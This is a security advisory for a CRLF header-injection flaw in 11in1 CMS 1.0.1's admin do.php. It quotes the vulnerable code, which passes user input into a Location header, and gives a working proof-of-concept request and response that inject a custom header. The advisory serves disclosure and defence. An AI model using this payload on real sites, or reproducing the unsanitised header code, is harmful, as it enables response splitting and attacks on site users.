11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability


Vendor: 11in1
Product web page: http://www.11in1.org
Affected version: 1.0.1

Summary: Eleven in One is an open-source content management
system (CMS) that is powered by PHP and MySQL. It does not
only help you manage your personal blog but also maintain
your postings at social networks. By establishing consistency
among the data transmitted from and to the blog, this CMS
sustains continuous harmonization of your data over time.

Desc: Input passed to the 'content' parameter in 'do.php' on
line 2112 is not properly sanitised before being returned to
the user. This can be exploited to insert arbitrary HTTP
headers, which are included in a response sent to the user.


==============================================================
/admin/do.php:
--------------------------------------------------------------

2088: // update status
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))
2090: {
2091:     $content = htmlspecialchars($_POST['content']);
2092:
2093:     // Get database information
2094:     $Database = new Database;
2095:     $info = $Database->getInfo();
2096:
2097:     // connect to database
2098:     $conn = mysql_connect($info[0], $info[1], $info[2]);
2099:     mysql_select_db($info[3], $conn);
2100:
2101:     $date = date("Y-m-d H:i:s");
2102:
2103:     // clear table
2104:     $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");
2105:
2106:     // close connection to db
2107:     mysql_close($conn);
2108:
2109:     // prepare success message
2110:     $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);
2111:
2112:     header("Location: msg.php?connect=yes&status=$content");
2113: }

==============================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           MySQL 5.5.16
           PHP 5.3.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            Zero Science Lab



Advisory ID: ZSL-2011-5055
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php



06.11.2011

------


POST /11in1/admin/do.php?action=postStatus HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection

--

HTTP/1.1 302 Found
Date: Sun, 06 Nov 2011 18:53:29 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: msg.php?connect=yes&status=
ZSL-Custom-Header: love_injection
Content-Length: 1716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html